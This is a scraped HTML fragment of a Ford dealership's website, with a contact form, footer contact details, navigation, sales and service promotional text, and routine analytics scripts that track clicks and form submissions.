class="sc-cHSUfg jwuqqb">Complete the form below and one of our friendly and professional staff will get you an answer right away.</p></div><div class="sc-sdtwF dTaPzh"><div class="sc-kQsIoO jYnKfE"><form method="post" target="_top" id="rocket-form-110" class="sc-cpmKsF cOwyZT" data-jzlbind-action-xhr="https://www.5starford.com/jzla5pform/submit/110" data-form-id="110" data-form-type="quick-question" data-jzlbind-submit-success=" jzlAnalytics('ROCKET_FORM_SUCCESS', { formType: 'quick-question', formId: 110, result: event.response.data } ) " data-jzlbind-submit-error=" jzlAnalytics('ROCKET_FORM_FAIL', { formType: 'quick-question', formId: 110, result: event.response } ) "><div submit-error="" class="sc-hjRWVT gbqJJl">Submission has failed! Please check your submission again!</div><div class="sc-eXNvrr chmeXf"><div class="first-name order-1 w-25 small sc-ePZHVD fPhJrO"><label for="form_110-input_5" class="sc-hzDEsm kJwvhg">First Name<span class="sc-bGbJRg pTaln">*</span></label><input type="text" data-field-type="first-name" required="" id="form_110-input_5" name="input_5" placeholder="Your first name" class="sc-jeCdPy eaHcMC" value=""></div><div class="last-name order-2 w-25 small sc-ePZHVD fPhJrO"><label for="form_110-input_6" class="sc-hzDEsm kJwvhg">Last Name<span class="sc-bGbJRg pTaln">*</span></label><input type="text" data-field-type="last-name" required="" id="form_110-input_6" name="input_6" placeholder="Your last name" class="sc-jeCdPy eaHcMC" value=""></div><div class="email order-3 w-25 small sc-ePZHVD fPhJrO"><label for="form_110-input_3" class="sc-hzDEsm kJwvhg">Email<span class="sc-bGbJRg pTaln">*</span></label><input type="email" data-field-type="email" required="" id="form_110-input_3" name="input_3" placeholder="[email protected]" class="sc-jeCdPy eaHcMC" value=""></div><div class="phone order-4 w-25 small sc-ePZHVD fPhJrO"><label for="form_110-input_2" class="sc-hzDEsm kJwvhg">Phone</label><input type="phone" data-field-type="phone" id="form_110-input_2" name="input_2" placeholder="111-222-3333" class="sc-jeCdPy eaHcMC" value=""></div><div class="comments w-100 order-5 large sc-ePZHVD eMYXFu"><label for="form_110-input_4" class="sc-hzDEsm kJwvhg">Tell us how we can help</label><textarea data-field-type="comments" id="form_110-input_4" name="input_4" rows="10" cols="50" placeholder="" class="sc-jtRlXQ fGoTtG"></textarea></div><div class="sc-gVyKpa cdUdqJ"><input type="hidden" data-field-type="jazel-lead-context" id="form_110-input_7" name="input_7" placeholder="" class="sc-jeCdPy eaHcMC" value=""></div><div class="gform_validation_container sc-ePZHVD eMYXFu"><label for="form_110-input_8" class="sc-hzDEsm kJwvhg">Name</label><input type="text" id="form_110-input_8" name="input_8" placeholder="" class="sc-jeCdPy eaHcMC" value=""><div class="sc-bEjcJn hPYrb">This field is for validation purposes and should be left unchanged.</div></div><div class="gform_validation_container sc-ePZHVD eMYXFu"><label for="form_110-input_9" class="sc-hzDEsm kJwvhg">reCAPTCHA Token</label><input type="text" id="form_110-input_9" name="input_9" placeholder="" class="sc-jeCdPy eaHcMC" value=""><div class="sc-bEjcJn hPYrb">Keep a token here.</div></div></div><div class="sc-iybRtq jDJubj"><input type="submit" class="c-da5f7112-adbc-43c0-8f9a-621524a17919 gform_button button sc-gPzReC kuOiUi" value="Send"></div><div submit-success="" class="sc-jrIrqw koyOOs"><template type="amp-mustache">{{#message}}{{message}}{{/message}}{{^message}}Thank you! You will receive a response from an agent shortly!{{/message}}</template></div></form></div><p class="sc-cugefK ceLztV">This site is protected by reCAPTCHA and the Google <a href="https://policies.google.com/privacy">Privacy Policy</a> and <a href="https://policies.google.com/terms">Terms of Service</a> apply.</p></div></div></div><script>(function(){ window.rocketFormData = window.rocketFormData || {}; window.rocketFormData[110] = {"2":{"id":2,"type":"phone","isRequired":false,"choices":[],"defaultValue":"","label":"Phone","placeholder":"111-222-3333","description":"","subLabelPlacement":"","descriptionPlacement":"","size":"small","cssClass":"phone order-4 w-25","inputs":[],"phoneFormat":"standard","fieldType":"phone"},"3":{"id":3,"type":"email","isRequired":true,"choices":[],"defaultValue":"","label":"Email","placeholder":"[email protected]","description":"","subLabelPlacement":"","descriptionPlacement":"","size":"small","cssClass":"email order-3 w-25","inputs":[],"fieldType":"email"},"4":{"id":4,"type":"textarea","isRequired":false,"choices":[],"defaultValue":"","label":"Tell us how we can help","placeholder":"","description":"","subLabelPlacement":"","descriptionPlacement":"","size":"large","cssClass":"comments w-100 order-5","inputs":[],"fieldType":"comments"},"5":{"id":5,"type":"text","isRequired":true,"choices":[],"defaultValue":"","label":"First Name","placeholder":"Your first name","description":"","subLabelPlacement":"","descriptionPlacement":"","size":"small","cssClass":"first-name order-1 w-25","inputs":[],"fieldType":"first-name"},"6":{"id":6,"type":"text","isRequired":true,"choices":[],"defaultValue":"","label":"Last Name","placeholder":"Your last name","description":"","subLabelPlacement":"","descriptionPlacement":"","size":"small","cssClass":"last-name order-2 w-25","inputs":[],"fieldType":"last-name"},"7":{"id":7,"type":"jazel_lead_context","isRequired":"","choices":[],"defaultValue":"","label":"Jazel Lead Context","placeholder":"","description":"","subLabelPlacement":"","descriptionPlacement":"","size":"","cssClass":"","inputs":[],"fieldType":null},"8":{"id":8,"type":"honeypot","isRequired":"","choices":[],"defaultValue":"","label":"Name","placeholder":"","description":"This field is for validation purposes and should be left unchanged.","subLabelPlacement":"","descriptionPlacement":"","size":"","cssClass":"gform_validation_container","inputs":[],"fieldType":null},"9":{"id":9,"type":"recaptcha","isRequired":"","choices":[],"defaultValue":"","label":"reCAPTCHA Token","placeholder":"","description":"Keep a token here.","subLabelPlacement":"","descriptionPlacement":"","size":"","cssClass":"gform_validation_container","inputs":[],"fieldType":null}}; })();</script></div></div></div></div></div><!-- .entry-content --><!-- --><!--<footer class="entry-footer">--><!-- --><!--</footer><!-- .entry-footer --><!-- --></article><!-- #post-2 --></main><!-- #main --></div><!-- #primary --></div><!-- #content --> <!-- Above Footer --> <!-- #Footer --><footer id="Footer" class="site-footer"> <!-- Below Footer --> <div class='page-footer-content bfooter'> <div class='container'> <div class='column one'><p><script type="application/ld+json">{ "@context": "http://schema.org/", "@type": "AutoDealer", "name": "Sam Pack's Five Star Ford", "image": "https://images.jazelc.com/uploads/5starford/logo.png", "address": "North Richland Hills, TX", "brand": "Ford", "url": "http://www.5starford.com/", "telephone": "817-500-0096" }</script></p></div> </div> </div> <div class="sc-dYzWWc bCTEKn sc-gMcBNU fgfzKz" data-jzlbind-class="'sc-dYzWWc bCTEKn ' + (&quot;empty&quot;)" sizes="mobile,tablet,tabletLg,desktop,desktopLg"><div width="100%" color="!desktopFooterBarTextColor" class="sc-AnqlK sc-iLVFha gyOKSt"><div height="100%" width="100%" class="sc-AnqlK sc-iLVFha BmyUS"><div class="sc-AnqlK sc-kkwfeq hNsfWn"><div class="sc-AnqlK sc-iBmynh sc-cCbPEh kzevSo"><div id="social-footer-links" class="sc-eklfrZ sc-csSMhA imtxfp"><div class="sc-AnqlK sc-iBmynh sc-hycgNl iBzoRC"><a target="_blank" class="sc-dTLGrV static-anchor addthis_button_facebook sc-ivVeuv fNrxUM" href="https://www.facebook.com/5StarFord"><div class="sc-AnqlK sc-iBmynh sc-cCbXAZ gtrSpm"><svg fill="rgb(255, 255, 255)" width="32" height="32" viewBox="0 0 24 24"><path d="M22.676 0H1.324C.593 0 0 .593 0 1.324v21.352C0 23.408.593 24 1.324 24h11.494v-9.294H9.689v-3.621h3.129V8.41c0-3.099 1.894-4.785 4.659-4.785 1.325 0 2.464.097 2.796.141v3.24h-1.921c-1.5 0-1.792.721-1.792 1.771v2.311h3.584l-.465 3.63H16.56V24h6.115c.733 0 1.325-.592 1.325-1.324V1.324C24 .593 23.408 0 22.676 0"></path></svg></div></a></div><div class="sc-AnqlK sc-iBmynh sc-hycgNl iBzoRC"><a target="_blank" class="sc-dTLGrV static-anchor addthis_button_google_plusone sc-ivVeuv fNrxUM" href="https://plus.google.com/114644627232876092007/about"><div class="sc-AnqlK sc-iBmynh sc-cCbXAZ gtrSpm"><svg fill="rgb(255, 255, 255)" width="32" height="32" viewBox="0 0 24 24"><path d="M7.635 10.909v2.619h4.335c-.173 1.125-1.31 3.295-4.331 3.295-2.604 0-4.731-2.16-4.731-4.823 0-2.662 2.122-4.822 4.728-4.822 1.485 0 2.479.633 3.045 1.178l2.073-1.994c-1.33-1.245-3.056-1.995-5.115-1.995C3.412 4.365 0 7.785 0 12s3.414 7.635 7.635 7.635c4.41 0 7.332-3.098 7.332-7.461 0-.501-.054-.885-.12-1.265H7.635zm16.365 0h-2.183V8.726h-2.183v2.183h-2.182v2.181h2.184v2.184h2.189V13.09H24"></path></svg></div></a></div><div class="sc-AnqlK sc-iBmynh sc-hycgNl iBzoRC"><a target="_blank" class="sc-dTLGrV static-anchor addthis_button_twitter sc-ivVeuv fNrxUM" href="https://twitter.com/5starford"><div class="sc-AnqlK sc-iBmynh sc-cCbXAZ gtrSpm"><svg fill="rgb(255, 255, 255)" width="32" height="32" viewBox="0 0 24 24"><path d="M23.954 4.569c-.885.389-1.83.654-2.825.775 1.014-.611 1.794-1.574 2.163-2.723-.951.555-2.005.959-3.127 1.184-.896-.959-2.173-1.559-3.591-1.559-2.717 0-4.92 2.203-4.92 4.917 0 .39.045.765.127 1.124C7.691 8.094 4.066 6.13 1.64 3.161c-.427.722-.666 1.561-.666 2.475 0 1.71.87 3.213 2.188 4.096-.807-.026-1.566-.248-2.228-.616v.061c0 2.385 1.693 4.374 3.946 4.827-.413.111-.849.171-1.296.171-.314 0-.615-.03-.916-.086.631 1.953 2.445 3.377 4.604 3.417-1.68 1.319-3.809 2.105-6.102 2.105-.39 0-.779-.023-1.17-.067 2.189 1.394 4.768 2.209 7.557 2.209 9.054 0 13.999-7.496 13.999-13.986 0-.209 0-.42-.015-.63.961-.689 1.8-1.56 2.46-2.548l-.047-.02z"></path></svg></div></a></div></div><div id="footer-section-two" class="sc-eklfrZ cbdynj"><div class="sc-AnqlK sc-iBmynh sc-hycgNl jhjAAu"><a class="sc-dTLGrV static-anchor undefined sc-ivVeuv ewREaR" href="https://www.5starford.com"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" width="142" height="109" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="rocket-contain-self sc-cLQEGU cETcYM" data-jzlbind-image-src="https://images-stag.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/logo_nrh.png"></a></div><div class="sc-AnqlK sc-iBmynh sc-hycgNl fyBDJh"><a class="sc-dTLGrV static-anchor undefined sc-ivVeuv ewREaR" href="https://www.5starford.com"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" width="152" height="100" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="rocket-contain-self sc-cLQEGU cETcYM" data-jzlbind-image-src="https://images-stag.jazelc.com/uploads/fivestarfordnrhspeed-sherwin/logo_triplecrown16years.png"></a></div></div><div id="footer-section-three" class="sc-eklfrZ sc-bscRGj epJrfl"><div class="sc-AnqlK sc-iBmynh sc-hycgNl iBzoRC"><a class="sc-dTLGrV static-anchor undefined sc-ivVeuv fNrxUM" href="tel:+18175000096"><div class="sc-dRCTWM sc-cgHJcJ dLLOIG"><div class="sc-AnqlK sc-iBmynh sc-cCbXAZ static-text sc-fHSTwm guQXYb">(817) 500-0096</div></div></a></div></div></div></div></div></div></div><div class="sc-dYzWWc bCTEKn sc-gMcBNU fgfzKz" data-jzlbind-class="'sc-dYzWWc bCTEKn ' + (&quot;empty&quot;)" sizes="mobile,tablet,tabletLg,desktop,desktopLg"><div width="100%" color="!desktopFooterTextColor" class="sc-AnqlK sc-iLVFha fpzXwg"><div height="100%" width="100%" class="sc-AnqlK sc-iLVFha BmyUS"><div class="sc-AnqlK sc-kkwfeq jmTZTf"><div class="sc-jotlie kTUHIm"><a href="tel:+18175000096" class="sc-fdQOMr jMWqco"><span class="sc-fAJaQT fSOlMl">Sales:</span> (817) 500-0096</a><a href="tel:+18175000097" class="sc-fdQOMr jMWqco"><span class="sc-fAJaQT fSOlMl">Service:</span> (817) 500-0097</a><a href="tel:+18175000094" class="sc-fdQOMr jMWqco"><span class="sc-fAJaQT fSOlMl">Parts:</span> (817) 500-0094</a><a href="/contact-us/" color="!desktopFooterTextHighlightColor" class="sc-fdQOMr cOzjXX">Contact Us</a></div></div></div></div></div><div class="sc-dYzWWc bCTEKn sc-gMcBNU fgfzKz" data-jzlbind-class="'sc-dYzWWc bCTEKn ' + (&quot;empty&quot;)" sizes="mobile,tablet,tabletLg,desktop,desktopLg"><div width="100%" color="!desktopFooterTextColor" class="sc-AnqlK sc-iLVFha fpzXwg"><div height="100%" width="100%" class="sc-AnqlK sc-iLVFha BmyUS"><div class="sc-AnqlK sc-kkwfeq jmTZTf"><div class="sc-clBsIJ jWSruU"><span class="sc-eqPNPO jHczye"><div class="sc-ileJJU eVzmeu">Showroom:</div> 6618 Ne Loop 820 At Rufe Snow, North Richland Hills, TX 76180-7844</span><a href="/hours-directions" color="!desktopFooterTextHighlightColor" class="sc-eMRERa hKWpVt">Get Directions</a></div></div></div></div></div><div class="sc-dYzWWc bCTEKn sc-gMcBNU fgfzKz" data-jzlbind-class="'sc-dYzWWc bCTEKn ' + (&quot;empty&quot;)" sizes="mobile,tablet,tabletLg,desktop,desktopLg"><div width="100%" color="!desktopFooterTextColor" class="sc-AnqlK sc-iLVFha fpzXwg"><div height="100%" width="100%" class="sc-AnqlK sc-iLVFha BmyUS"><div class="sc-AnqlK sc-kkwfeq jmTZTf"><nav class="sc-guztPN rocket-menu-bar menu-mode-flex sc-cFlXAS ggAvII"><div class="sc-AnqlK menu-item sc-hcnlBt IcXvH"><a href="https://www.5starford.com/inventory/new-vehicles/" target="" class="sc-gJqsIT sc-kDhYZr hkRiam"><div class="sc-AnqlK menu-entry-text sc-bvTASY bmTxNh">New Ford</div></a></div><div class="sc-AnqlK menu-item sc-hcnlBt IcXvH"><a href="https://www.5starford.com/inventory/used-vehicles-merged/" target="" class="sc-gJqsIT sc-kDhYZr hkRiam"><div class="sc-AnqlK menu-entry-text sc-bvTASY bmTxNh">Used Cars</div></a></div><div class="sc-AnqlK menu-item sc-hcnlBt IcXvH"><a href="https://www.5starford.com/new-ford-specials-north-richland-hills-tx/" target="" class="sc-gJqsIT sc-kDhYZr hkRiam"><div class="sc-AnqlK menu-entry-text sc-bvTASY bmTxNh">Specials</div></a></div><div class="sc-AnqlK menu-item sc-hcnlBt IcXvH"><a href="https://www.5starford.com/finance-center/" target="" class="sc-gJqsIT sc-kDhYZr hkRiam"><div class="sc-AnqlK menu-entry-text sc-bvTASY bmTxNh">Finance</div></a></div><div class="sc-AnqlK menu-item sc-hcnlBt IcXvH"><a href="https://5starford.worktrucksolutions.com/" target="_blank" class="sc-gJqsIT sc-kDhYZr hkRiam"><div class="sc-AnqlK menu-entry-text sc-bvTASY bmTxNh">Work Trucks</div></a></div><div class="sc-AnqlK menu-item sc-hcnlBt IcXvH"><a href="https://www.5starford.com/parts-center/" target="" class="sc-gJqsIT sc-kDhYZr hkRiam"><div class="sc-AnqlK menu-entry-text sc-bvTASY bmTxNh">Parts</div></a></div><div class="sc-AnqlK menu-item sc-hcnlBt IcXvH"><a href="https://www.5starford.com/service-center/" target="" class="sc-gJqsIT sc-kDhYZr hkRiam"><div class="sc-AnqlK menu-entry-text sc-bvTASY bmTxNh">Service</div></a></div><div class="sc-AnqlK menu-item sc-hcnlBt IcXvH"><a href="https://www.5starford.com/collision-center/" target="" class="sc-gJqsIT sc-kDhYZr hkRiam"><div class="sc-AnqlK menu-entry-text sc-bvTASY bmTxNh">Collision</div></a></div><div class="sc-AnqlK menu-item sc-hcnlBt IcXvH"><a href="https://www.5starford.com/about-us/" target="" class="sc-gJqsIT sc-kDhYZr hkRiam"><div class="sc-AnqlK menu-entry-text sc-bvTASY bmTxNh">About</div></a></div></nav></div></div></div></div><div class="sc-dYzWWc bCTEKn sc-gMcBNU fgfzKz" data-jzlbind-class="'sc-dYzWWc bCTEKn ' + (&quot;empty&quot;)" sizes="mobile,tablet,tabletLg,desktop,desktopLg"><div width="100%" color="!desktopFooterTextColor" class="sc-AnqlK sc-iLVFha fpzXwg"><div height="100%" width="100%" class="sc-AnqlK sc-iLVFha BmyUS"><div class="sc-AnqlK sc-kkwfeq jmTZTf"><div class="sc-AnqlK sc-iBmynh sc-hycgNl blgozf"><div class="sc-AnqlK sc-iBmynh sc-chAAoq ckiPbG"><div class="sc-dRCTWM sc-cgHJcJ dLLOIG"><div class="sc-AnqlK sc-iBmynh sc-cCbXAZ static-text sc-fHSTwm coYJYV"><p><a href="/sitemap/">Sitemap</a> | <a href="/privacy-policy/">Privacy Policy</a> | <a href="https://www.forddirectprivacy.com/" target="_blank">Ford Privacy Policy</a> | <a href="/definitions-disclosures/">Definitions &amp; Disclosures</a> | <a href="https://www.forddirectprivacy.com/dcterms.html" target="_blank">Terms &amp; Conditions</a> | <a id="_bapw-link" href="#" target="_blank" style="text-decoration:none !important"> <img id="_bapw-icon" style="border:0 !important;display:inline !important;vertical-align:middle !important;padding-right:5px !important;"/> <span style="vertical-align:middle !important">AdChoices</span> </a> <script type="text/javascript"> var pacode = "02486-F"; (function(tmid, domain, lang) { var d = document, h = d.getElementsByTagName('script')[0] || d.head, s = d.createElement('script'); s.type = 'text/javascript'; s.async = true; s.setAttribute('data-id', tmid); if (domain) s.setAttribute('data-domainoverride', domain); if (lang) s.setAttribute('data-languageoverride', lang); s.src = '//c.evidon.com/sitenotice/tagmanager/ghostery-tag-manager.js'; h.parentElement.insertBefore(s, h); }('GHOSTTM-4259-0001', pacode, null)); </script></p></div></div></div></div></div></div></div></div><div class="sc-dYzWWc bCTEKn sc-gMcBNU fgfzKz" data-jzlbind-class="'sc-dYzWWc bCTEKn ' + (&quot;empty&quot;)" sizes="mobile,tablet,tabletLg,desktop,desktopLg"><div width="100%" color="!desktopFooterTextColor" class="sc-AnqlK sc-iLVFha fpzXwg"><div height="100%" width="100%" class="sc-AnqlK sc-iLVFha BmyUS"><div class="sc-AnqlK sc-kkwfeq jmTZTf"><div class="sc-AnqlK sc-iBmynh sc-cNQqM fCCbMB">Copyright © 2019 FordDirect. All Rights Reserved</div></div></div></div></div><div class="sc-dYzWWc bCTEKn sc-gMcBNU fgfzKz" data-jzlbind-class="'sc-dYzWWc bCTEKn ' + (&quot;empty&quot;)" sizes="mobile,tablet,tabletLg,desktop,desktopLg"><div width="100%" color="!desktopFooterTextColor" class="sc-AnqlK sc-iLVFha fpzXwg"><div height="100%" width="100%" class="sc-AnqlK sc-iLVFha BmyUS"><div class="sc-AnqlK sc-kkwfeq jmTZTf"><div class="sc-AnqlK sc-iBmynh sc-hycgNl blgozf"><div class="sc-AnqlK sc-iBmynh sc-chAAoq ckiPbG"><div class="sc-dRCTWM sc-cgHJcJ dLLOIG"><div class="sc-AnqlK sc-iBmynh sc-cCbXAZ static-text sc-fHSTwm coYJYV"><p> Although every reasonable effort has been made to ensure the accuracy of the information contained on this site, absolute accuracy cannot be guaranteed. This site, and all information and materials appearing on it, are presented to the user "as is" without warranty of any kind, either express or implied. All vehicles are subject to prior sale. Price does not include applicable tax, title, license, processing and/or documentation fees, and destination charges. &Dagger;Vehicles shown at different locations are not currently in our inventory (Not in Stock) but can be made available to you at our location within a reasonable date from the time of your request, not to exceed one week. </p></div></div></div></div></div></div></div></div><div class="sc-dYzWWc bCTEKn sc-gMcBNU fgfzKz" data-jzlbind-class="'sc-dYzWWc bCTEKn ' + (&quot;empty&quot;)" sizes="mobile,tablet,tabletLg,desktop,desktopLg"><div width="100%" color="!desktopFooterTextColor" class="sc-AnqlK sc-iLVFha fpzXwg"><div height="100%" width="100%" class="sc-AnqlK sc-iLVFha BmyUS"><div class="sc-AnqlK sc-kkwfeq jmTZTf"><div class="sc-AnqlK sc-iBmynh sc-hycgNl blgozf"><div class="sc-AnqlK sc-iBmynh sc-chAAoq ckiPbG"><div class="sc-dRCTWM sc-cgHJcJ dLLOIG"><div class="sc-AnqlK sc-iBmynh sc-cCbXAZ static-text sc-fHSTwm coYJYV"><h1>Five Star Ford Dallas, Fort Worth, TX</h1><p>Sam Pack's Five Star Ford of North Richland HIlls offers a large inventory of new and used Ford trucks, SUVs, vans and cars for sale in DFW, including Ford Edge, Escape, Expedition, Explorer, F-150, F-250, Fiesta, Flex, Fusion, Mustang, Transit Connect, Transit Cargo Van. Stop by our Ford dealership Dallas Fort Worth area and take advantage of Ford incentives, rebates, special offers and car lease deals. See our <a href="/hours-directions/">opening hours</a> now for sales, parts and service. 5 Star Ford Dealer Dallas, TX offers new car specials, Ford truck deals and and used Ford specials.</p><h2>New &amp; Used Ford Dealership<br> </h2><p>Five Star Ford dealer inventory offers a wide variety of new and used cars for sale in North Richland Hills. Certified used Ford trucks, cars and SUVs are often available. Our Dallas Ford dealership provides a comprehensive inspection for all certified pre-owned Ford vehicles for sale at Sam Pack Ford.</p><h2>Ford Service, Parts, Accessories</h2><p>Our Five Star Ford service mechanics work on all types of vehicles at our certified Ford Service Center in North Richland HIlls. Auto service includes oil change, new tires, new brakes, new battery, engine and transmission service. You can order Ford Parts and accessories online or visit our Ford dealer in the DFW area.</p><h2>Ford Financing, Lease, Specials</h2><p>The 5 Star Ford financing staff can help you lease or finance a new or used Ford in Dallas, Fort Worth, TX. Ford dealer specials include cash rebates, financing incentives and Ford lease deals to help you save money when buying or leasing a new car. We consider all credit types, including bad credit auto financing. Our nearby Ford dealership can help you buy a new or used Ford, even with bad credit or no credit.</p></div></div></div></div></div></div></div></div> </footer><!-- #colophon --> </div><!-- #page --> <script> if (!Element.prototype.matches) { Element.prototype.matches = Element.prototype.msMatchesSelector; } document.addEventListener('click', function(e) { if (e.target.matches(".sms-button")) { var dataset = e.target.dataset; var make = dataset.make; var model = dataset.model; var trim = dataset.trim; var vin = dataset.vin; var conditions = (dataset.conditions || "").split(","); var modelYear = dataset.year; var bodyType = dataset.vehicleType; window.jzaq.push(['AUTO5.CTA_CLICK', { year: modelYear, make: make, model: model, trim: trim, vin: vin, conditions: conditions, bodyType: bodyType, actionType: 'edmunds-sms' }]); } }, true); </script> <script>_satellite.pageBottom();</script> <script> var updateObjectFns = []; function jzlAddAnalyticsUpdateObject(fn) { updateObjectFns.push(fn); } function jzlAnalyticsUpdateObject(obj, action, params) { for( var i = 0; i < updateObjectFns.length; i++ ) { updateObjectFns[i](obj, action, params); } } var postLoadActionFns = []; function jzlAddAnalyticsPostLoadAction(fn) { postLoadActionFns.push(fn); } function jzlAnalyticsPostLoadAction(obj, action) { for( var i = 0; i < postLoadActionFns.length; i++ ) { postLoadActionFns[i](obj, action); } } window.jzlAddAnalyticsUpdateObject = jzlAddAnalyticsUpdateObject; window.jzlAnalyticsUpdateObject = jzlAnalyticsUpdateObject; window.jzlAddAnalyticsPostLoadAction = jzlAddAnalyticsPostLoadAction; window.jzlAnalyticsPostLoadAction = jzlAnalyticsPostLoadAction; </script> <script> (function() { if (!Element.prototype.matches) { Element.prototype.matches = Element.prototype.msMatchesSelector; } document.addEventListener("click", function(e) { if (e["jzaqClickProcessed"]) { return; } for (var el = e.target; el != null && el !== document; el = el.parentNode) { if (el.tagName === "A") { window.jzaq.push(['GLOBAL_ACTION.LINK_CLICK', { inMain: el.matches("main a"), href: el.href }]); break; } } }); window.jzlAddAnalyticsUpdateObject(function(obj, action, params) { if (action === "GLOBAL_ACTION.LINK_CLICK") { obj['action_in_main'] = params.inMain; obj['action_href'] = params.href; } }); })(); </script> <script> jazelReady(function() { function isString(obj) { return typeof obj === 'string' || obj instanceof String; } var vehicleDataTypeMapping = { "year": "year", "make": "make", "model": "model", "trim": "trim", "new_or_used": "condition", "ext_color": "exterior_color", "int_color": "interior_color", "vin": "vin", "price": "price", "mileage": "mileage", "stock_no": "stock_no", "body_style": "body_style", "transmission": "trans" }; // Some field types are encoded in CSS classes var fieldTypesEncodedInCss = [ "first-name", { map: "first_name", to: "first-name" }, "last-name", { map: "last_name", to: "last-name" }, "address1", { map: "address_1", to: "address1" }, "address2", { map: "address_2", to: "address2" }, "city", "state", "zipcode", { map: "zip", to: "zipcode" }, "email", "phone", "date", "time", "comments", "position", "coverletter", "resume", "experience", "notsure", "services-list", "vehicle-info", "condition", "year", "make", "model", "trim", "trans", "mileage", "vin", "newest", "oldest", "high-mileage", "low-mileage", "high-price", "low-price", "signup", "reminder", "income", "birthdate", "social" ].reduce(function (acc, x) { if (isString(x)) { acc[x] = x; } else { acc[x.map] = x.to; } return acc; }, {}); function classesToArray(className) { if (className == null) { return []; } return className .split(" ") .filter(function (x) { return x != null && x !== ""}); } function findFieldType(cssClass) { // If we have a better way to get this out of the form in the future, use it here var fieldType = null; var classes = classesToArray(cssClass); for (var i = 0; i < classes.length; i++) { var className = classes[i]; var theType = fieldTypesEncodedInCss[className]; if (theType != null) { fieldType = theType; break; } } return fieldType; } if (!Element.prototype.matches) { Element.prototype.matches = Element.prototype.msMatchesSelector; } var forms = { 85: 'quick-question',86: 'claim-your-special',87: 'contact-us',88: 'claim-your-special',89: 'employment-application',90: 'claim-your-special',91: 'finance-question',92: 'quick-question',93: 'claim-your-special',94: 'claim-your-special',95: 'order-parts',96: 'parts-question',97: 'request-quote',98: 'review',99: 'schedule-service',100: 'service-question',101: 'service-question',102: 'test-drive',103: 'trade-in-value',104: 'vehicle-locator',105: 'service-question',106: 'collision-estimate',107: 'service-question',108: 'service-question',109: 'service-question',110: 'quick-question',111: 'redeem-offer-srp',112: 'e-price-srp',113: 'e-price-vdp',133: 'collision-estimate' }; jQuery(document).on("submit", function(e) { for (var el = e.target; el !== document; el = el.parentNode) { if (el.matches("form[id^='gform_']")) { var form = el; var pieces = form.id.split("_"); var formId = parseInt(pieces[1]); var formType = forms[formId]; var fields = {}; var elements = form.elements; for (var k = 0; k < elements.length; k++) { var element = elements[k]; var vehicleDataType = element.dataset != null ? element.dataset.vehicleDataType : null; if (vehicleDataType != null) { var mapped = vehicleDataTypeMapping[vehicleDataType]; if (mapped != null) { fields[mapped] = element.value; continue; } } var wrap = null; for (wrap = element; wrap !== document; wrap = wrap.parentNode) { if (wrap.matches(".gfield")) { break; } } var fieldType = findFieldType(wrap.className); if (fieldType != null) { var value = undefined; var add = false; if (element.type === "radio") { if (element.checked) { value = element.value; } } else if (element.type === "checkbox") { if (element.checked) { value = element.value; add = true; } } else { value = element.value; } if (value !== undefined) { if (add) { if (fields[fieldType] == null) { fields[fieldType] = []; } fields[fieldType].push(value); } else { fields[fieldType] = value; } } } } fields["category"] = fields["body_style"]; window.jzaq.push(['FORM.SUBMITCLICK', { provider: "Gravity", formId: formId, formType: formType, formNode: form, fields: fields, ctaLabel: el.dataset.ctaLabel }]); } } }); }); window.jzlAddAnalyticsUpdateObject(function(obj, action, params) { if (action === "FORM.SUBMITCLICK") { obj['form_provider'] = params.provider; obj['form_id'] = params.formId; obj['form_type'] = params.formType; obj['form_fields'] = params.fields; obj['cta_label'] = params.ctaLabel; } }); </script> <script> (function() { var ftsForms = document.querySelectorAll("#fts-form"); for (var i = 0; i < ftsForms.length; i ++) { (function() { var fts = ftsForms[i]; fts.addEventListener("submit", function() { var searchText = fts.querySelector("input[type='search']").value; window.jzaq.push(['AUTO5.FTS_INPUT_SUBMITTED', { searchText: searchText }]); }); // Submit form by button click var searchBtn = fts.querySelector("div[role='button']"); searchBtn.addEventListener("click", function() { var searchText = fts.querySelector("input[type='search']").value; window.jzaq.push(['AUTO5.FTS_INPUT_SUBMITTED', { searchText: searchText }]); }); })(); } })(); (function() { window.jzlAddAnalyticsUpdateObject(function(obj, action, params) { if (action === "AUTO5.FTS_INPUT_SUBMITTED") { obj['fts_search_text'] = params.searchText; } }); })(); </script> <script> (function() { if (!Element.prototype.matches) { Element.prototype.matches = Element.prototype.msMatchesSelector; } // events not fired by auto5 that we need to catch var rocketCoupons = document.querySelectorAll(".RocketCoupon-Wrapper"); for (var i = 0; i < rocketCoupons.length; i++) { (function() { var coupon = rocketCoupons[i]; var couponTitle = coupon.querySelector(".RocketCoupon-Title").innerHTML; var buttons = coupon.querySelectorAll(".RocketCoupon-CTA, .RocketCoupon-PrintButton, .RocketCoupon-DetailsButton"); for (var j = 0; j < buttons.length; j++) { (function() { var button = buttons[j]; var isPrint = button.matches('.RocketCoupon-PrintButton'); var isDetails = button.matches('.RocketCoupon-DetailsButton'); button.addEventListener('click', function(e) { e["jzaqClickProcessed"] = true; window.jzaq.push(["AUTO5.COUPONS_CLICK", { couponTitle: couponTitle, isPrint: isPrint, isDetails: isDetails }]); }); })(); } })(); } window.jzlAddAnalyticsUpdateObject(function(obj, action, params) { if (action === "AUTO5.COUPONS_CLICK") { obj['coupon_title'] = params.couponTitle; obj['coupon_is_print'] = params.isPrint; obj['coupon_is_details'] = params.isDetails; } }); })(); </script> <script> (function() { if (!Element.prototype.matches) { Element.prototype.matches = Element.prototype.msMatchesSelector; } var tabNames = [ "make_model", "price_range", "vehicle_type", "fuel_type", "mpg", "year_range" ]; var hpsms = document.querySelectorAll(".c-58d2b975-9f59-4f3e-a894-ff3949562a49"); for (var i = 0; i < hpsms.length; i++) { var hpsm = hpsms[i]; var tabs = hpsm.querySelectorAll(".c-19487b37-fd75-43f9-ac96-c2765079b1ec"); for (var j = 0; j < tabs.length; j++) { var tab = tabs[j]; tabNames.forEach(function(tabName) { if (tab.matches(".tab-" + tabName)) { tab.addEventListener("click", function() { window.jzaq.push(['AUTO5.HPS_TAB_CLICK', { tabName: tabName }]); }); } }); } } })(); (function() { window.jzlAddAnalyticsUpdateObject(function(obj, action, params) { if (action === "AUTO5.HPS_TAB_CLICK") { obj['hps_tab_name'] = params.tabName; } }); })(); 